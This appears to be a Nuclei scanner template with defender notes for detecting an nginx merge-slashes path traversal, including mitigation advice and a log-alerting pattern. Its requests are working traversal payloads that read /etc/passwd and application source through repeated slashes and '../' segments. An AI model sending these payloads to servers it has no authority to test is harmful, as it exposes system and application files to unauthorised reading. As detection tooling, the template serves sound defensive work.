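---
# Nuclei template: reports a host when a request path made of repeated slashes
# followed by "../" segments returns a file from outside the web root.
#
# Defender notes:
#   - nginx collapses repeated slashes by default (`merge_slashes on`). A hit
#     suggests that normalisation is disabled, or that the raw path reaches a
#     backend which resolves "../" itself. Confirm against the actual config.
#   - Mitigation: keep `merge_slashes` enabled, make the backend canonicalise
#     the path, and confine file serving to a fixed root.
#   - Detection: access-log entries with runs of "/" directly followed by
#     "../" are worth alerting on, whatever the response code.
id: nginx-merge-slashes-path-traversal

info:
  name: Nginx Merge Slashes Path Traversal
  author: dhiyaneshDk
  severity: medium
  description: >-
    The server returns /etc/passwd or the application's app.js when the
    request path combines repeated slashes with parent-directory segments,
    so files outside the intended web root are readable.
  reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json
  tags: exposure,config

requests:
  - method: GET
    path:
      - "{{BaseURL}}//////../../../etc/passwd"
      - "{{BaseURL}}/static//////../../../../etc/passwd"
      - "{{BaseURL}}///../app.js"

    # Both matchers must hold: a 200 response AND a body that looks like one
    # of the two target files.
    matchers-condition: and
    matchers:
      # The original matched the bare word "root:", which also fires on any
      # 200 page that merely contains that text (docs, error pages, catch-all
      # routes). Requiring the uid/gid fields of the passwd root entry keeps
      # the true positives and drops most of that noise.
      - type: regex
        part: body
        condition: or
        regex:
          - 'root:.*:0:0:'
          # Literal "app.listen", as in the original word matcher. This is
          # still a loose signal: a page quoting server code would match too.
          - 'app\.listen'

      - type: status
        status:
          - 200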